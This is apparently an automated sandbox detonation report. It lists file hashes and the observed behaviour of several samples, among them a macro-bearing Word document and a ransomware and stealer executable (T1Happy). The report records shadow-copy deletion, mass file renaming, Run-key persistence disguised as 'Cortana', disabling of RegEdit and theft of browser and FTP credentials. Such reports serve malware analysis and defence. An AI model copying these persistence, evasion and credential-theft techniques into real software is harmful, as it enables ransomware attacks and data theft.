SHA256 9a0099e55d3f18892208dfd6627fb7e0fe3bf002dc3a0660e11f238f325ae619
SHA512 665589b07f8b938716a4991fe4c79426eaa1530334e0a77518d6840750cd8cb121764c95176ebfbebfa0d97f67da3be44d9413a9efbfc1f73c97ad7bcb915fe0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 857dca8067ac951311e2574449d15dd9
SHA1 ab4cce505a36d6a084d1ceb4d2e618abe643ccad
SHA256 fbe124cccbc0e589105b3e1543d570f886d671429a5599ca3e1bce9a285cff9c
SHA512 4d167d32f0db96ca6884ae720013b67e741acc88f12bc69f79de41edc6f611cb6fc0a84778f9d461595c4d0170484c8e8af8bb1c664772b2e11e2336f7a11b1d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b2a8384a28ed4fa28e485f3bf0dbc91f
SHA1 8e61727691b7d9e989b86157c5f96be6cde9a80c
SHA256 1c8a9dc3caa0d2cb48cfe6ee041878f6810458e9839f4333bf0e8f8ac0fad09a
SHA512 dbcaeb6008acb8f41af15cc2cb394729a0c2067a5a255f2c9eec56e2208ea95e37a48fa36af03eff66a65b29544bccf1f508d9d54bdb31f7be658fc3e4f6beba

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d764851983b159a28c2b1436918274d2
SHA1 40be46caf56a38ac8f06c71de8acd45528d300db
SHA256 8997c26b18eaac8ac417e34ed5122ca2514b01184fe553a167b70f11de9f25d7
SHA512 c33047e5d53ddcf86a532d73ea6ad32aa7bc3c871a2a49e43dcc3a9ab3264548446b8fdd8e4c327b90166cf843e18527143dedf5576c5e27772c18883f2cd1b0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2e17ed58d368110e0374ecfa4b308e1c
SHA1 a3781f69cb4262803d1319b547c2a6bcfae37ec7
SHA256 d32888ff8a12a2f2f52a0601bcc2885a6541b8764b5adf7a999f2d0ac103240d
SHA512 09e4883b326cafa54fc7de5764fffbb1dfbd4ebbd43bc070295815f137737bf5285654c13644a48c1824cec9e9643e4a34a35783e1f45e332ce091a8e79edb53

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b2eb0d5510d02c2a4e72c6a703055d2d
SHA1 f4c980ec1c714022c4b0f9789704da5eb1fc7991
SHA256 a6ee666f3e9f8b2733eedfc031c76575f5321da7cad0e3bac9b03c785bfe37e5
SHA512 7c54ac297fa203525988aba19e85734974d3066745c55880b02203a981b1fe441771cf859d1e9edb66558de0b5424eb910edb0b93d1d81f2e857aad9856e4fbe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 671c57d4fcaa281ee5a5f58029d46a87
SHA1 8ac1bb64686620638d0d55ff4b9aa01f67e80dc6
SHA256 825fde202331abbee1e00354f7b04d13d1e92b2565a61e201f648f81e5a3911b
SHA512 d4fdda79933564f6309a0f62ef48ae449a2861f05572578cf587db0d05b65ed6a72a85c0df28d63be30ec8910b8d973b270100a6ed17e39c831ebeb556c9fd9c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 791af685c309d82a7c431feda3f6550e
SHA1 f5092cfa8db6a347e975468fee4af75a50ba8d5b
SHA256 1b5e9fad4b135fbf4f7072bdc363913bf223c33f368e8e7f9185abf252361763
SHA512 b93b4f233afdd6eb0702ed278979d012a46a57cb9f7afa51af4c7d3f7ca75a8944c2b05be5a8fa1eaaa00def56421f3a13cd5bc3a9f877acb2ee0d1b6995ef20

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8abba63eed0fc51db6df1c1c95ef8c38
SHA1 80419a53103c3b2a964336dd605289003bd65b86
SHA256 092e256aca4f47702ef50f4d62987990fc5591e022c3c3da9e86deee723379bd
SHA512 2d1e92e7b64abfe0ca9bc89edb4da74b4f42f7b83fa329a352bd8254feeacc17876fdffa97f6cfec137ccc26cd8cd575df6bc9de92534508bcb251d369af4b8e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a62e24911465918336a4a2bb772812df
SHA1 81930232d1a3ea70479226cd4b0db8c0fe0f4288
SHA256 8abb34819a227f417b8a88ea734259199056cb7bc0a03d53416a6d1584076b1a
SHA512 e1c33298f1fbc0817f3705ea92bc17c93bc51bd95c520420bd6f2903573f20f07f43f6c79c9bdb3a66eb34d0978719c4be71c27ad0c4c551cf775a27ebc01cd8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 baf60c4957e7bbc1e31c1a9155dc4f64
SHA1 18543727bbecb3cc41b1f77dc9f7e299124114b6
SHA256 de56ee67be6f329600f5d30da671a04804d9dcc50236df7fd7d7e5a779a35453
SHA512 aa1a6fd1dc961cc7ed2cab1f573ed699d220ac9adfa0f47f6b4453e88e1ee3f6fa448354e94755162b4b0e6209149277c7ef052d510c66112517d62a58636159

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 95e3ee2dfa0b6d5f7206da9b21686e67
SHA1 c5f55d6392811fb626ed01b7c962abdd542920e8
SHA256 517010463a5c76a9591b9898d0b5f872993e53a8c15d083c17176d5d565cbeb2
SHA512 50b8d2376d71f5c689973d698c955cabd590df561120f84d19ff361887cd1755cb4d38bef5561fcd1879b6f9ac37dcfae79c23df8da7b2e2f6d3a874ce35c0fe

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 65ab68ad3d7c2addb8e1695cb6a01af5
SHA1 8e65dc39db453fc2feda7f63e61761d6e261ebc3
SHA256 86a446b63f145e1c5d5ec5c1d1c42974518199148a245c58e552d9c1051f66a8
SHA512 97067c97c9009e488c3e19001619475e0aec173a6c9b81672f2b8beffb094a3075aecdb3ceaf81a74c202067a0c5cefe83fa68f0f4b50335a817521cdae7b65e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1bd0743e8b67e62580a552ec8f9c2349
SHA1 a4f32df7ad6f5929e44dce00b9f69f6a432dbbc7
SHA256 460b4b52eacf0fdda6e6f993cdb64fe6b5ee7db79c8430e77cfc575ff7f3f7ad
SHA512 5408c795e6182aa3baeb5604d95ac2804e547885eeba025b945f71dd244b15f75d0cf77fd147d5a0edf1820e6363eb47a39e533a6c5aadc5dab2b210cfbe6c4d

Analysis: behavioral16

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

160s

Max time network

123s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected.doc"

Signatures

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp\:Zone.Identifier:$DATA C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected.doc"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /n "C:\Users\Admin\Desktop\ConvertToSearch.potx"

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\Desktop\PublishSplit.docx"

Network

N/A

Files

memory/2616-0-0x000000002F6C1000-0x000000002F6C2000-memory.dmp

memory/2616-2-0x000000007094D000-0x0000000070958000-memory.dmp

memory/2616-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2616-4-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-12-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-10-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-11-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-9-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-7-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-6-0x0000000000570000-0x0000000000670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tuyen bo chung Viet Nam - Hoa Ky - Infected.doc

MD5 5d076ea73525a76ff3f95f5eb34b92a7
SHA1 e0f7df188cfe954790e9ff7189f367f00c523757
SHA256 7282e949d46bf42ba0978f49f18022e20555fdb90a4bfeb4c1ccfbe8a86684fd
SHA512 3dbcb4facd19aa3603ba218b6dd31f7a18a82752bd3d1c4aff0daa679341a5ae2d954fa1d11e1d7013552242f88df6e8b4b793d4df08980537cbd0003238ba99

memory/2616-8-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-5-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2616-28-0x000000007094D000-0x0000000070958000-memory.dmp

memory/2616-29-0x0000000000570000-0x0000000000670000-memory.dmp

memory/2972-30-0x000000002DA41000-0x000000002DA42000-memory.dmp

memory/2972-32-0x000000007094D000-0x0000000070958000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2972-52-0x000000007094D000-0x0000000070958000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner2.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner2.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.MalwareScanner2.exe"

Network

N/A

Files

memory/2232-0-0x000007FEF61C3000-0x000007FEF61C4000-memory.dmp

memory/2232-1-0x0000000001120000-0x0000000001148000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20241010-en

Max time kernel

122s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.PopupAlert.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.PopupAlert.exe

"C:\Users\Admin\AppData\Local\Temp\ScreenCapture_Win8.PopupAlert.exe"

Network

N/A

Files

memory/2064-0-0x000007FEF5653000-0x000007FEF5654000-memory.dmp

memory/2064-1-0x00000000009E0000-0x0000000000A56000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-22 03:39

Reported

2024-11-22 03:44

Platform

win7-20240903-en

Max time kernel

299s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\T1.exe"

Signatures

T1Happy

trojan ransomware t1happy

T1happy family

t1happy

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (5457) files with added filename extension

ransomware

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1.exe" C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Cortana = "C:\\Users\\Admin\\AppData\\Local\\Temp\\T1.exe" C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\screen.jpg" C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00810_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00373_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\BCSLaunch.dll C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL107.XML C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LABEL.DPV C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145669.JPG C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382962.JPG C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\IPEDITOR.DLL C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME13.CSS C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00161_.GIF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00100_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21332_.GIF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\MSMAPI\1033\MSMAPI32.DLL C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent.png C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0232395.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSACCESS.EXE C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\mset7fr.kic C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\HAMMER.WAV C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00163_.GIF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00921_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH02166_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\FAX\UrbanFax.Dotx C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\icon.png C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188667.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216540.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318448.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PAPER_01.MID C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\GRPHFLT\PICTIM32.FLT C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR38F.GIF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplateRTL.html C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBARBLL.XML C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\PersonalMonthlyBudget.xltx C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\it\UIAutomationClient.resources.dll C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Windows Media Player\WMPMediaSharing.dll C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Common Files\System\msadc\msadcor.dll C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Technic.eftx C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18216_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\gadget.xml C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SPRNG_01.MID C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18235_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\settings.html C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\micaut.dll.mui C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01954_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\CONTACTL.ICO C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate.css C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\LETTHEAD.XML C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00938_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299587.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_h.png C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_down_BIDI.png C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\EN00006_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\INTLDATE.DLL C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02158_.WMF C:\Users\Admin\AppData\Local\Temp\T1.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\takeown.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\T1.exe N/A
